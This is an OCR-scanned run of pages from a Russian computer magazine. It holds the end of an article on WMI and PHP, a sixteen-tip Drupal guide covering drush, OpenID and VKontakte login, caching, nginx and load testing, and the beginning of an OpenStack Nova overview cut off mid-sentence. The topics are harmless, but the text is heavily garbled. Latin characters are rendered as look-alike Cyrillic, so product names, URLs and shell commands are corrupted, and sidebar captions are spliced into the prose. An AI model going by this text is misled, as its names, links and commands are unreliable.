нения связки РНР и ѴѴМІ для удаленного мониторинга и управления 
ѴѴіпсІоѵѵз-системами. В исходниках ты найдешь пример получения 
РТР (роіпіег) записей домена (файл бп5_р1т.рЬр), реализованный с 
помощью использования пространства имен /гооі/МісгозоЬВІМЗ и 
провайдера Місгозо1і:ВІ\І5_РТРТуре. Вся эта система у меня реализо- 
вана в виде ѵѵеЬ-сайта с подключаемыми модулями-функциями (см. 
картинку). 

В общем, теперь все рычаги управления ѴѴіпсІоѵѵз-системами с помо- 
щью рбр-интерпретатора в твоих руках — пользуйся, но не в деструк- 
тивных целях! т 
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ЗУИ/АСК 



■ ■ Игорь Антонов апіопоѵ.ідог.кЬѵгадтаіІ.сот, ЬМр://ѵг-опІіпе.ги 



Уроки 

ОшраГогии 

Шестнадцать советов начинающему 
друпалыцику 

Про него говорят: гибкий и сложный, безопасный и быстрый. Им многие восхищаются, 
но не все решаются применять в своих проектах. Да, он такой, этот РгираІ. Умеет многое, 
но чтобы получить от него максимальную отдачу, разработчику придется как следует попотеть 
и разобраться в многочисленных тонкостях. Этот путь тернист и труден, но цель однозначно того 
стоит. Я начал применять ЭгираІ в своем большом проекте не так давно, но уже успел набить 
несколько шишек и хочу уберечь от этого тебя. Заинтригован? Тогда приготовься выслушать 
советы от уже не совсем начинающего РшраГера. 



Совет №іу|Саждому проекту — 

Эгираі пригоден не только для строительства ѵѵеЪ-сайтов, но и для 
разработки ѵѵеЪ-приложений. Зачастую подобные приложения раз- 
рабатываются для внутрикорпоративных нужд. К таким проектам 
предъявляются совсем другие требования, и типичной сборки Эгираі 
может оказаться мало. Да, все легко допилить и настроить, но иногда 
беспокоиться об этом не нужно, так как любители ЭгираГауже все 
сделали. 

Из альтернативных «версий» Игираі я могу посоветовать 
ВгаіпзюгтВІо^ег (ЪгайыогтЫо^уег.огу) и Ореп Атит (орепатшп. 
сот) . Первый проект — это сборка ИшраГа, специально разработан- 
ная для быстрого создания блогов. Использовать чистый Пгираі для 
строительства блога — процесс трудоемкий, и не каждый новичок с 
ним справится. Специально для таких случаев и людей наш сооте- 
чественник сделал альтернативную сборку Пгираі. Каіпзшгт В1о§§ег 
готов к работе прямо из коробки и содержит в себе все необходимые 
модули (облако тегов и прочее) для развертывания полноценного 
блога. В случаях, когда нужен простой блог, это идеальный вариант. 
Также хочу отметить, что применение ВгаіпзШгт Ыо§§ег не накла- 
дывает никаких ограничений. Ты можешь устанавливать дополни- 
тельные модули, выполнять автоматическое обновление движка и 
так далее. 

Второй проект, о котором я хочу тебе рассказать — Ореп Атит. 

Он позволяет в кратчайшие сроки поднять систему для совмест- 
ной работы. Если ты руководишь отделом, то однозначно знаком 
с подобными проектами. Они позволяют закреплять задачи за 
определенным сотрудником, планировать время их выполнения, 
отслеживать процесс завершения, формировать отчеты и прочее. 
Большинство таких программ — платные, но в функциональ- 
ном плане они не сильно выигрывают (или вовсе проигрывают) 
Ореп Атит. Если перед тобой встала задача найти и развернуть 
подобный софт, то обязательно присмотрись к этому продукту. Он 
быстрый, функциональный, бесплатный, и при острой необходи- 
мости его можно допилить под себя. Набор ключевых функций 
привожу ниже: 

• Система тикетов; 

• Блоги; 

• Календарь; 

• Документы ѵѵікі; 

• Доска для групповой работы. 



Совет №2: Рулим ОгираГом 
из командной строки 

Удобный ѵѵеЪ-интерфейс панели администрирования Пгираі — это 
хорошо, но отнюдь не всегда удобно. Как было бы здорово иметь 
возможность выполнять административные операции прямо из 
командной строки. . . А ведь это возможно! Достаточно загрузить 
и установить пакет сігизЬ. ПіН:р://сігира1.ог^/ргоіесі:/сіги5Іі) . С его 
помощью администратор бгираГа может выполнять разнообразные 
действия прямо из консоли: 

• Получать информацию о настройках сайта; 

• Устанавливать /удалять модули; 

• Выполнять обновление движка и так далее. 

Из всех возможностей сігизіія чаще всего пользуюсь функцией 
обновления модулей. Стандартный процесс загрузки апдейтов 
славится своей занудностью. Изначально требуется составить список 
обновившихся модулей, затем зайти на официальный сайт Пгираі 
и перейти на страницу конкретного модуля. Потом загрузить его, 
переместить в нужную директорию, выполнить скрипт обновления 
и прочее. Ладно еще, если нужно обновить один модуль, а если их де- 
сять, двадцать? Запросто можно сойти с ума! Куда веселее выполнять 
эту процедуру при помощи сігизіі. В этом случае достаточно восполь- 
зоваться командами ир и ирс. Удаление/отключение новых модулей 
выполняется аналогичным образом. Например, для удаления модуля 
предусмотрена команда: 

$ . /<±гизЪ. ипіпзііаіі <модуль или список модулей> 

Примерно так же происходит отключение и включение 
модулей : 

$ . /сІгизК еп Ыод //включаем модуль Ыод 

$ . /сІгизК сііз Ыод //отключаем модуль Ыод 

Кроме перечисленных вкусностей, сігизЬ. сослужит хорошую службу, 
если ты умудришься установить глючный модуль и положишь отоб- 
ражение панели администрирования. Как в такой нелегкой ситуации 
корректно удалить виновный модуль? Пгизіі сможет оказать первую 
помощь и посредством одной команды удалит капризный модуль. 

Совет №3: Авторизация по ОрепЮ 

Сайты с собственной системой авторизации отходят на второй план. 
Жизненно-необходимых ѵѵеЪ-сервисов с каждым днем становится 
все больше и хранить в голове десятки связок из логинов/паролей 
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— задача не из легких. Чтобы как-то ее решить, в свое время и был со- 
здан ОрепГО — открытая централизованная система, позволяющая 
пользователю использовать единый логин/пароль для выполнения 
авторизации на различных сайтах. Последнее актуально, если они 
поддерживают ОрепГО. 

Начиная с шестой версии, в составе Пгираі идет модуль, обеспечива- 
ющий возможность авторизации по ОрепГО. Однако, чтобы начать 
использовать на сайте ОрепГО, необходимо подключить еще один 
модуль, содержащий настройки для различных поставщиков ОрепГО. 
Таких поставщиков много, но наиболее популярными (для россий- 
ских пользователей) являются Уапйех, КатЫег, Соо§1е, Ьіѵе іоигпаі, 
ѴКоШакге, РасеЪоок и некоторые другие. Для зарубежных сервисов 
(Соо^іе, Ьіѵе іоигпаі, РасеЪоок) в репозиториях Пгираі есть соответс- 
твующие модули, а вот для российских — нет. Когда передо мной 
встала задача прикрутить ОрепГО-авторизацию, то мне пришлось 
основательно прошерстить интернет с целью поиска решения. И оно 
нашлось! Чтобы все было тип-топ, нужно воспользоваться модулем 
ОрепГО Ехіепзіоп (Ьі:ф://йгира1.огу/Ше5/І55ие5/орепіс1 ехЕ І.гір) 
от нашего соотечественника. Обрати внимание, данный модуль — 
не очередной вариант взаимодействия с ОрепГО. Это просто удобный 
блок для выполнения авторизации, а также возможность выбора 
поставщика ГО-параметров в нашей стране. 

Совет №4: ОгираІ + «ВКонтакте» 

Включить на сайте авторизацию по ОрепГО, несомненно, полезно, но 
что если нам потребуется всего лишь обеспечить более простой вход 
на сайт (без регистрации) пользователям, имеющим аккаунт в соци- 
альной сети «ВКонтакте»? Да, можно просто отключить лишних пос- 
тавщиков в ЕхГегпаІ Ропп Бо^іп, но это не решит проблему. Выполняя 
вход по ѴКоШакгеГО, пользователю фактически придется создать 
новую учетную запись на сайте. При входе он увидит стандартную 
регистрационную форму, ожидающую заполнения. Да, даже пароль 
придется придумывать. И лишь после создания аккаунта к нему бу- 
дет привязан ОрепГО-идентификатор (в данном случае ѴКоШакгеГО), 
и пользователь сможет выполнять вход по нему. Сам понимаешь, 
такой подход не очень удобен, и воспользоваться им можно не всегда. 
Иногда требуется реализовать что-то более простое. Представь, как 
было бы здорово, если бы пользователь, имеющий аккаунт «ВКонтак- 
те», мог сразу войти на твой сайт. Другими словами, Пгираі должен 
создавать новую учетную запись автоматически на основании полу- 
ченных данных от «В Контакте». К счастью, добиться такого эффекта 
не так-то сложно. Примерно полгода назад разработчики популяр- 



ной социальной сети открыли доступ к ОрепАРІ-интерфейсу. Благо- 
даря этому пользователи получают возможность выполнять автори- 
зацию на сторонних сайтах, используя учетную запись «ВКонтакте». 
Добавить в Пгираі поддержку «ВКонтакте ОрепАРІ» позволяет модуль 

ѴК ОрепАРІ (Ънр://бгира1.огу/ргоіесі:/ѵк орепарі) . Модуль прост 
в использовании, и с его помощью легко настроить новую систему 
авторизации. Помимо авторизации ѴКОрепАРІ может добавить к 
материалам кнопку «ЗЪаге», позволяющую пользователям делиться 
понравившимся материалом. 



Совет №5: Выбираем продвинутый 
шаблонизатор 

Одним из самых удачных шаблонизаторов для РНР считается ЗтаПу 
Гтѵгѵ. зтагЕѵ.пеР) . Во многих современных СМ5 используется имен- 
но он, и на это есть причины. Главные из них — гибкость, удобство 
и большие возможности. Увы, по умолчанию в Пгираі применяется 
собственный шаблонизатор, но при желании легко можно подклю- 
чить и зтапу. Для этого необходимо загрузить згпапу Лете еп^іпе 
для Пгираі (Ъі:і:р://с1гира1.ог^/ргоіесі:/5тагГѵ) и, собственно, сам 
5тапу (ссылку ищи выше) . После этих нехитрых операций ты полу- 
чишь возможность создавать темы на базе Зтапу. Кстати, почему- 
то готовых тем не так много, поэтому у тебя есть все шансы стать 
автором самой красивой и удобной 5тапу-темы, на которой будут 
учиться тысячи пользователей. 



г №6іС чего начинать созда 
ервои собственной темы дл$ 

ЯІ • 



Совет №6^ч 

В т 

тира 



Рано или поздно перед ПгираГером встает задача по разработке собс- 
твенной темы оформления. Я бы сказал, что именно на этом этапе 
90% новичков принимают фатальное решение: «Пгираі не для меня». 
Отчасти их можно понять, поскольку темизация — одна из самых 
сложных и непонятных вещей. Нужно приложить усилия, чтобы 
хорошо освоить данный процесс и применять его в дальнейшем без 
сучка и задоринки. Чтобы освоение проходило более гладко и понят- 
но, я бы рекомендовал тебе выполнить несколько простых шагов. 

1. Чтение мануалов. Если уровень английского позволяет, то знако- 
миться с темизацией стоит после чтения официальной документа- 
ции (Ънр://бшра1.ог;е/боситептйопЛЪете) . В ней содержится 
куча как полезного, так и бесполезного материала. В любом случае, 
изучив его, ты однозначно поймешь, как работают темы в Пгираі и 
познакомишься с другими нюансами этой области. Вторым обяза- 
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5ѴМ/АСК 




Сайт проекта ЭгизЬ 




Официальный сайт проекта ОрепАІгіит 

тельным для чтения пунктом будет цикл статей от Романа Архарова, 
профессионального Пгираі-разработчика. Роман написал несколько 
замечательных статей по Пгираі Ші:ф://рста^.ги/50Іийоп5/беі:аі1. 
р!ір?ІП=37518) . Среди них есть и статья про темизацию. 

2. Изучение темы 2еп. Начать разрабатывать новую тему для Пгираі с 
чистого листа — довольно сложный процесс. Новичку вряд ли хватит 
сил и терпения завершить его до конца. Для облегчения жизни лучше 
взять за основу тему 2еп (Ьнр://йгира1.огу/ргоіесі:/2еп) . Весь код темы 
хорошо прокомментирован и работать с ним — одно удовольствие. 

Совет №7: БИагесІ хостинг или ѴР5? 

Сам по себе Пгираі достаточно шустрый, но стоит обвешать его 
дополнительными модулями и вывести в свободное плавание, 
как начинаются проблемы с производительностью. Чтобы Пгираі 
«летал», нужно позаботиться о правильной настройке окружающей 
его среды. Речь идет, конечно, о ѵѵеЪ-сервере, СУБД, РНР и так далее. 
Максимальная производительность возможна лишь при тщательной 
настройке всех компонентов. К несчастью, получить доступ ко мно- 
гим настройкам перечисленного ПО на обычном хостинге нельзя. 
Приходится довольствоваться тем, что предлагает хостер. Чтобы 
посетители твоего проекта не наблюдали белый экран смерти вместо 
искомого сайта, я советую тебе не использовать зйагесі-хостинг для 
размещения более-менее посещаемого ресурса. Лучше потратить 
немного денег и приобрести ѴР5, на котором ты будешь хозяином и 



сможешь сам определять настройки всех серверных компонентов 
(включая ОС) . 

Совет №8: Начальная оптимизация 

Сразу после установки Пгираі нужно приступить к базовой оптими- 
зации. Пгираі быстр, но если есть возможность что-то ускорить, ей 
надо пользоваться. Процесс оптимизации Пгираі условно можно 
разделить на три группы: 

1. Базовая. Реализуется средствами движка. Самостоятельно рулить 
этими параметрами из панели администрирования ты можешь сразу 
после завершения инсталляции системы. 

2. Расширенная. Для Пгираі разработаны специальные модули, поз- 
воляющие повысить общую производительность системы (напри- 
мер, посредством продвинутого кэширования) . 

3. Серверная. Под серверной оптимизацией подразумевается 
настройка серверных компонентов, взаимодействующих с 
Пгираі. 

Итак, вначале посмотрим на базовую оптимизацию. В настрой- 
ках производительности системы (асІтіп/зетп^з/реНогтапсе) 
доступно несколько опций, влияющих на быстродействие. Первое, 
с чего стоит начать оптимизацию, — включение кэша. По умол- 
чанию он отключен и администратору доступно два варианта 
кэширования: «нормальный» и «агрессивный». Самую большую 
производительность дает «агрессивный» режим, но не стоит оболь- 
щаться. Лучше выбрать «нормальный». Это оптимальный режим 
для сайта с большим числом зарегистрированных пользователей. 
Если же сайт малопосещаем, то в таком случае хорошим выбором 
станет «агрессивный» режим. 

Советую обратить внимание на группу настроек «Оптимизация 
пропускной способности». Она позволяет активировать объедине- 
ние С55 и іаѵаЗсгірі: в единые файлы. Зачем? Дело в том, что многие 
дополнительные модули тянут с собой сзз/)з файлы. При загрузке 
очередной страницы происходит обращение к нескольким файлам 
на сервере. А это, в свою очередь, лишние соединения. Чтобы мини- 
мизировать затраты, можно выполнить объединение. В этом случае 
Пгираі создаст единый файл с с$5/]5, который и будет загружаться 
браузером пользователя. 
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Вход для пользователей 

Имя пользователя: * 




Зарегистрироваться 
Запросить новый пароль 



Бой™ И КЙКГЭвГГё 



Удобная кнопка авторизации через 
«В Контакте» 

Совет №9: Серверные 
компоненты 

С самого начала важно понять, что быстродействие 
Эгираі напрямую зависит от настройки компонентов 
внешней среды. К таковым относятся ѵѵеЪ-сервер, 

СУБД и РНР. Если что-то из этого списка работает неэф- 
фективно, то ни о какой хорошей производительности 
не может быть и речи. Настраивать все компоненты 
можно долго, но я хотел бы обратить твое внимание 
на самые важные настройки — настройки РНР. Весь 
Огираі написан сугубо на РНР, поэтому крайне важно 
позаботиться о настройке этого интерпретатора. В 
конфигурационном файле РНР есть куча директив, но 
для Огираі особенно важной будет рйр_ѵа1ие тетогу_ 
Нтй. Как видно из названия, директива отвечает за 
объем памяти, выделяемой для выполнения сценария. 
Понятное дело, что чем ее больше, тем лучше. Если 
говорить конкретно в цифрах, то крайне желательно 
установить значение больше 32М (то есть больше 
32-х мегабайт) . Помимо установки объема памяти, не 
менее важной опцией является тах_ехсесигіоп_йте 
(максимальное время выполнения сценария). Обычно 
здесь выставляют значение от 30 и выше. Чем больше 
будет время исполнения сценария, тем меньше ты 
будешь видеть белый экран смерти. 

• Акселератор для РНР 

Как бы в народе не хвалили РНР за простоту и быс- 
тродействие, трудно не согласиться с тем, что этот 
интерпретатор все равно медленный. Для выполнения 
каждого сценария интерпретатору РНР необходимо 
сначала считать и разобрать весь код сценария, затем 
выполнить его и вернуть результаты. Эта операция 
проводится постоянно, и на нее тратится самый драго- 
ценный ресурс — время. Для решения этой проблемы 
были придуманы так называемые рйр-акселераторы — 
программы, ускоряющие выполнение рйр-сценариев. 
Ускорение достигается за счет кэширования байт-кода 




Результаты нагрузочного тестирования 



каждого сценария. Для достижения максимальной 
производительности желательно установить ка- 
кой-нибудь акселератор. Один из наиболее удачных 
представителей этого типа программ — еАссеІегашг 

( Кггр://ѵ\гѵѵѵѵ.еассе1егаШг.пеі:) . Он прост в установке 
и настройке, а также существенно ускоряет реакцию 
интерпретатора. 

•СУБД 

Чаще всего в качестве СУБД для ѵѵеЪ-проектов выступа- 
ет МуЗС^Ь. Он быстрый, бесплатный, кроссплатфор- 
менный и обладает всеми необходимыми функциями. 
Но по настройке и оптимизации МуЗС^Ь пишут целые 
книги, так что я не буду лезть в дебри, а сразу посове- 
тую включить кэширование (в ту5^1). 

Совет №10: Альтернатив- 
ное кэширование 

В вопросе оптимизации пределов не существует. Но в 
Нгираі таких ограничений более, чем достаточно. И одним 
из таких тормозов является встроенная система кэширо- 
вания. Она работает хорошо, но для больших проектов ее 
не хватает. Именно поэтому членами сообщества Нгираі 
была разработана альтернативная система кэширова- 
ния. Решений подобного рода несколько, но лучшим из 
них я считаю сасЬегоиІег ( щр://сігира1.ог^/ргоіесі:/ 
сасйегоигег) . Проект СИ представляет собой модуль для 
Нгираі и реализует хранение кэша в памяти посредством 
возможностей демона тетсасйесі или акселераторов 
(АРС, еАссеІегашг, ХСасйе) . В общем, рекомендовано для 
больших проектов. 

Совет №11: Ѵіеѵѵз вместо сво- 
их запросов 

Как-то раз мне попался сайт на базе Нгираі. В нем во мно- 
жестве мест были понатыканы 5^1-запросы. Разработчик 
использовал их для вывода в блоки различной инфор- 
мации: последние статьи, последние новости и прочее. 
Способ имеет право на существование, но пользоваться 
им все же не рекомендуется. Правильнее будет воспользо- 
ваться модулем Ѵіел/ѵз (Кнр://бгира1.огу/ргоіесг/ѵіе\ѵ5) . 
Он позволяет создавать различные представления, и, 
самое главное, делает их эффективно. Тебе не нужно раз- 
бираться в структуре БД — даже сложные выборки реаль- 
но сделать путем применения визуального конструктора. 
Кроме того, есть возможность управлять кэшированием, 
создавая очередное представление. При реализации вью- 
шек для редко изменяемой информации эта возможность 
будет кстати. 
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• —офи- 
циальный сайт 
сообщества Эгираі: 
здесьтебя всегда 
ждет последняя вер- 
сия СМР, актуальная 
документация, об- 
ширный репозиторий 
модулей; 

• ѵѵѵѵѵѵ.сігираі.ги 

— русскоязычное 
сообщество Эгираі: 
пожалуй, старейший 
ресурс о Эгираі в 
рунете. Есть актив- 
ный форум, свежие 
новости, большое 
количество людей, 
готовых оказать 
первую ПОМОЩЬ; 

• ИЦрУ/сопІепІ- 
тападетепі- 
зѵзіетз.іпіо/ 

— отличный русс- 
коязычный ресурс 
о Эгираі: сниппеты, 
РАО, статьи о СМР 
Огираі; 

• ѵг-опііпе.ги — бес- 
платный электрон- 
ный журнал для 
программистов и 
всех тех, кто интере- 
суется околокомпью- 
терными вопросами. 
С недавнего времени 
на сайте появился 
раздел, посвящен- 
ный Огираі. Пока ста- 
тей немного, но уже 
есть, что почитать. 
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Сайт легендарной Убунты построен на РгираІ 



Совет №12: ОгираІ.АРІ 

Существует заблуждение, что вместо использования АРІ можно от- 
дать предпочтение дедовскому способу — прямому выполнению 
запросов. Конечно, есть ряд задач, решать которые лучше именно 
таким способом. Но это скорее исключение. Во всех остальных ситуа- 
циях правильнее будет пользоваться ПгираІ.АРІ. Вызывая документи- 
рованные функции, разработчик может быть уверен, что его действия 
не повлекут за собой негативные последствия. К примеру, если для 
добавления нового пользователя существует специальная функция, 
то ни в коем случае не стоит показывать понты и делать это запросом. 
В случаях, когда функции мало, желательно все же сначала посмот- 
реть ее исходник, изучить выполняемые запросы и только затем на их 
основе составлять собственные. 

Совет №13: Нагрузочное 
тестирование 

Вновь созданный проект лучше сразу подвергнуть жесткому тести- 
рованию. Хоть трижды закрути все болты и гайки, но шанс, что сайт 
не выдержит шквала посетителей, есть всегда. Желательно сразу 
потратить время на нагрузочное тестирование и уже на ранних 
этапах исключить возможные провалы. Для проведения подоб- 
ных тестов хорошо себя зарекомендовал сервис Ъххр : / ЛоасИтрасЕ. 
сот . Он предлагает различные тесты для проверки ѵѵеЪ-проекта на 
устойчивость к нагрузкам. Тесты есть на любой вкус и кошелек. Для 
серьезного анализа имеется рго-версия. Она, конечно, стоит денег, но 
тестов в ней больше, а значит и польза — ощутимей. Не пугайся: если 
проект поднимается на общественных началах, то хватит и бесплат- 
ного варианта. Во всяком случае, ты будешь точно знать, что твой сайт 
уверенно себя чувствует при заходе на него пятидесяти человек. 

Совет №14: Хороший индеец — 
мертвый индеец 

Ни для кого не секрет, что Олимп ѵѵеЪ-серверов уже много лет возглав- 
ляет АрасЬе. Это действительно хорошее и качественное ПО, хотя и 
не слишком быстрое. АрасЬе в связке с Нгираі показывает не лучшие 
результаты и при большом наплыве посетителей становится самым 
узким местом. Частично победить тормоза позволяет хардкорный 
тюнинг, но превратить его в гепарда все равно не удастся. Лучше 
сразу от него отказаться и забыть, как о страшном сне. А чем же тогда 



щее время п^іпх, пожалуй, самый быстрый ѵѵеЪ-сервер. Тот же АрасЬе 
он обходит уже на старте и практически ничем ему не уступает (за 
исключением количества модулей, которое у п^іпх пока невелико) . 
Недавно на нашем проекте (Титр: //ѵг-опііпе.ги) мы решили отказать- 
ся от АрасЬе и полностью перешли на п^іпх. Производительность воз- 
росла даже визуально: при открытии страниц создается впечатление, 
что на генерирование вообще не требуется времени. При использова- 
нии Арасйе об этом можно было только мечтать. 

Совет №15: Приручаем пдіпх 

Ы^іпх превосходно подходит для ЭгираГовских проектов, но чтобы 
все четко и правильно работало, нужно уделить время настройке. Тут 
методом научного тыка не обойтись. Придется пересилить себя и про- 
читать объемную документацию, а также повторить все полученные 
знания на практике. Чтобы как-то облегчить себе жизнь, рекомендую 
скачать конфиг ( нрз: //щЕйиЪ.сот/ѵйа^ег/пщпх йгираі) для п^іпх, 
специально созданный для Пгираі. Предложенный конфигурацион- 
ный файл содержит все необходимое для того чтобы Пгираі корректно 
заработал с п§іпх. Если перечислить возможности, которые отражены 
в конфигурационном файле, то получится: 

• чистые игі; 

• мультисайтинг; 

• повышенное время выполнения ГазЩ^і; 

• поддержка Ъоозі: и так далее. 

Совет №16: Готовься к ОгираІ 7 

Не забывай, что разработчики уже давненько трудятся над созданием 
седьмой версии этого замечательного фреймворка. Совсем недавно 
вышел первый (на момент написания этих строк) релиз-кандидат, и 
я бы рекомендовал тебе его потестировать при возможности. В новой 
ветке реализованы интересные фичи, которых так давно не хватало 
ЭгираГу. 

Заключение 

Пгираі — не самая простая СМ5, которую легко настроить в несколько 
кликов мышкой. Чтобы выжать из него максимум и поднять нетипич- 
ный проект, придется повозиться. Точнее — как следует повозиться. 
Однако после первого успешного проекта Пгираі уже не будет казать- 
ся таким страшным и странным. Не отступай и не сдавайся! Пробуй, 
экспериментируй и, я надеюсь, мои бшраГные советы тебе помогут. 
Удачи! т 
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ЗУИ/АСК 



■ ■ Евгений Зобнин гоЬпіпгадтаіІ.сот 



Облако, 

открытое для всех 

Открытая сіоисі-инфраструктура ОрепЗіаск: 
обзор и первые впечатления 

Не так давно на страницах рубрики $уп/аск мы рассматривали открытую систему для создания 
облачных сервисов ЕисаІуріиз, которая лежит в основе ОЬипНі Епіегргізе Сіоисі. Сегодня мы 
поговорим о его главном конкуренте, одним из разработчиков которой выступает агентство 
ЫА5А, а среди покровителей числятся ІпіеІ, АЛЛО, РеІІ еще два десятка именитых компаний. 



* 

і 



Ч 



Мы привыкли к тому, что все наши приложения, сетевые сервисы и 
базы данных работают на реальных, осязаемых машинах, которые 
необходимо покупать, доставлять, выделять площадь для установ- 
ки, настраивать и следить за работоспособностью. Однако времена 
меняются и на смену дорогостоящим железным серверам приходят 
серверы виртуальные, которые гораздо дешевле, удобнее в обслу- 
живании и совершенно не боятся экспериментов и чрезвычайных 
ситуаций. Спустя несколько секунд после клика по кнопке «купить» 
наш новенький сервер готов к работе и мы даже не подозреваем 
о том, как он функционирует, какую часть серверной занимает и 
сколько выделяет тепла. А также не заботимся о своевременной 
замене жестких дисков и других компонентов системы. Все это 
происходит где-то далеко в облаке, скрыто от наших глаз. 
Виртуальные серверы получили очень широкое распространение 
после открытия сервиса Атагоп ЕС2, который стал эталоном для 
облачных сервисов уровня Іаа5 (это когда в аренду сдается целая 
инфраструктура для управления виртуальными серверами, а не 
выделенная виртуальная машина или приложение). ЕС2 позволил 
организациям отказаться от собственных серверных и половины 
штата системных администраторов в пользу парка удобных в сопро- 
вождении удаленных серверов, которые можно использовать для 
любых нужд, увеличивая количество машин по мере надобности. 
Сервис, созданный Атагоп, оказался не только удобным в исполь- 
зовании, но и весьма технологичным, так что многие, кто пытался 
создать облако для своих нужд или конкуренции с Атагоп, терпели 
неудачу. При всей простоте самой идеи, облачный сервис уровня 
Іаа5 очень труден в реализации, потому как требует создания 
умной, самоконтроллируемой инфраструктуры, которая бы умела 
равномерно распределять нагрузку между физическими машина- 
ми, не боялась расширения и была устойчива к сбоям оборудова- 
ния. Такое было под силу только большим коммерческим организа- 
циям, которые просили за свои продукты немалых денег, а тем, кто 
не мог их заплатить, приходилось довольствоваться тем, что есть: 
большим количеством разрозненных компонентов, которые нужно 
собирать вместе и долго тестировать надежность работы получив- 
шейся системы. 

Еисаіуршз стал одним из первых Ореп Зоигсе проектов, нацелен- 
ных на создание комплексной инфраструктуры, позволяющей 
поднять сіоиб-сервис уровня Іаа5 не прибегая к дополнительным 
инструментам. Предлагаемая им инфраструктура действительно 
удобна, эффективна, устойчива и, что немаловажно, полностью 
совместима с клиентскими инструментами Атагоп ЕС2. Тем не 
менее, инфраструктура на основе Еисаіуршз оказалась недоста- 
точно масштабируемой, а публичная версия фреймворка сильно 



урезанной по функциональности. Поэтому совсем скоро на рынке 
появился проект, призванный решить эти проблемы и, ни много ни 
мало, стать стандартной открытой платформой. 

ОрепЗшск был образован путем слияния двух независимых проек- 
тов: «Сіоисі Еііез апб Сіоисі Зегѵегз», разрабатываемой КоскЗрасе, и 
«НеЪиІа Сіоисі Ріаііогт», созданной ЫАЗА. В результате получилась 
довольно интересная солянка, разделенная опять же на два почти 
независимых продукта: ОрепЗсаск ІМоѵа и ОрепЗсаск Зѵѵііт. 

ІМоѵа — счетная машина 

Главный компонент ОрепЗсаск — это ІМоѵа (Сотрите), контроллер, 
управляющий работой виртуальных машин. Фактически ІМоѵа 
отвечает за все: обрабатывает запросы на создание виртуальных 
машин, соединяет их с внешним миром, следит за работоспособнос- 
тью и распределением нагрузки на физические машины и каналы 
связи, реагирует на сбои и т.д. ІМоѵа основана на коде системы ЫАЗА 
ЫеЬиІа ( ІШр : //пеЬиІа.паза. ^оѵ/) , написана на языке программиро- 
вания РусЬоп и опирается на протокол обмена сообщениями АМС^Р. 
Система состоит из семи обособленных компонентов: 

• контроллер облака (Сіоисі СопсгоПег) следит за состоянием систе- 
мы и выступает в роли связующего звена всех остальных компонен- 
тов системы; 

• сервер АРІ (АРІ Зегѵег) реализует ѵѵеЪ-интерфейс, позволяющий 
управлять контроллером облака; 

• контроллер вычислений (Сотрите СопсгоПег) отвечает за запуск 
виртуальных машин и их связь со всей остальной инфраструктурой; 

• хранилище (ОЪуеЩ 5шге) предоставляет сервис хранения данных, 
совместимый с Атагоп 53; 

• менеджер аутентификации (АшЬ Мапа^ег) предоставляет серви- 
сы аутентификации и авторизации; 

• контроллер томов (Ѵоіите Сошгоііег) позволяет подключать вир- 
туальные устройства хранения к виртуальным машинам; 

• сетевой контроллер (НеПѵогкСопітоІІег) создает виртуальные 
сети, позволяя виртуальным машинам взаимодействовать друг с 
другом и внешней сетью; 

• планировщик (ЗсЬесІиІег) ответственен за выбор подходящего 
контроллера вычислений для запуска новой виртуальной машины. 
На рисунке хорошо видно, как эти компоненты связаны между 
собой. Сервер АРІ, контроллер облака и менеджер аутентификации 
составляют «управляющий центр» облака, который должен рабо- 
тать на выделенной машине. Администратор использует утилиту 
поѵа-тапа§е для управления характеристиками всей инфраструк- 
туры и доступом к ней пользователей. Клиенты, желающие исполь- 
зовать облачный сервис, подключаются к серверу АРІ с помощью 
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Типы облачных сервисов 



5аа5 — ЗоЙѵѵаге аз а Зегѵісе (программное обеспечение 
в качестве сервиса). Предоставляет потребителю 
возможность использовать ПО, работающее в облаке. 
Ярчайший пример: д та іі. 

Раа5 — РІаЙогт аз а Зегѵісе (платформа в качест- 
ве сервиса). Позволяет потребителю развертывать 
собственные приложения на подготовленной для этого 
платформе. В качестве примера можно привести среду 
Заѵа, работающую удаленно. 

Іаа5 — Іпітазіхисіиге аз а Зегѵісе (инфраструктура в 
качестве сервиса). Дает потребителю целую инфраструк- 
туру, позволяющую запускать виртуальные машины, 
налаживать межу ними связь и использовать дисковое 
пространство. 








клиентских утилит Атагоп ЕС2 или их свободного 
варианта под названием еиса2оо1 из проекта Еисаіуршз. 
Еще одна выделенная машина отвечает за управление 
хранилищем данных (0^‘есі: Зіоге) . В состав Ыоѵа вклю- 
чена только начальная реализация 53-совместимого 
хранилища данных, которая может быть использована 
только для отладки. В реальных же проектах на ее месте 
должен быть установлен Зѵѵііт, развивающийся обособ- 
ленно от Ыоѵа. 

Еще одна машина — это контроллер томов, позволяю- 
щий подключать к виртуальным машинам своего рода 
внешние накопители данных (виртуальные флэш- 
брелки). Его присутствие в инфраструктуре совсем не 
обязательно. 

Несколько машин выполняют работу сетевых 
контроллеров, которые отвечают за распределение 
ІР-адресов между виртуальными машинами и могут 
выступать в роли шлюза, отделяющего виртуальные 
машины от остальных сегментов сети. Обычно на 
один сегмент внутренней виртуальной сети приходит- 
ся один сетевой контроллер, но это скорее правило, 
чем требование. 

Одна из машин выполняет функции планировщика, 
который должен следить за контроллерами вычислений 
и, в случае поступления нового запроса на создание вир- 
туальной машины, выбирать для этой цели наиболее 
подходящего кандидата (решение о пригодности может 
быть принято на основе загруженности контроллеров 
вычислений, количества виртуальных машин, выполня- 
емых на них и других факторов) . 

Контроллеры вычислений — это основной костяк 
облачной инфраструктуры ОрепЗшск, обычно их коли- 
чество намного превосходит количество всех остальных 
машин сети. Контроллеры вычислений занимаются 
приемом запросов на создание новой виртуальной 
машины, ее запуском, слежением за состоянием вирту- 
альных машин, перезапуском и так далее. Чем больше 
контроллеров вычислений в инфраструктуре, тем боль- 
ше клиентов может обслуживать сервис. 

Обработка пользовательских запросов в такой системе 
выглядит следующим образом: используя клиентские 
инструменты, пользователь инициирует запрос на 
создание виртуальной машины к серверу АРІ. После ау- 
тентификации и авторизации пользователя сервер АРІ 
разбирает запрос и посылает его контроллеру облака, 
который инициирует три новых запроса: к сетевому 
контроллеру, к хранилищу и к планировщику. Сетевой 
контроллер выделяет ІР-адрес для новой виртуальной 
машины и возвращает его контроллеру облака. В сете- 
вом хранилище происходит поиск подходящего образа 
жесткого диска для будущей виртуальной машины, 



адрес которого возвращается контроллеру облака. 
Теперь, имея все необходимое для создания новой вир- 
туальной машины, контроллер облака посылает запрос 
планировщику, который выбирает наиболее подходя- 
щий контроллер вычислений и отдает ему запрос на 
создание ВМ. После того, как новая ВМ будет запущена, 
контроллер облака завершает свою работу и сообщает 
серверу АРІ об успехе всей операции. Теперь пользо- 
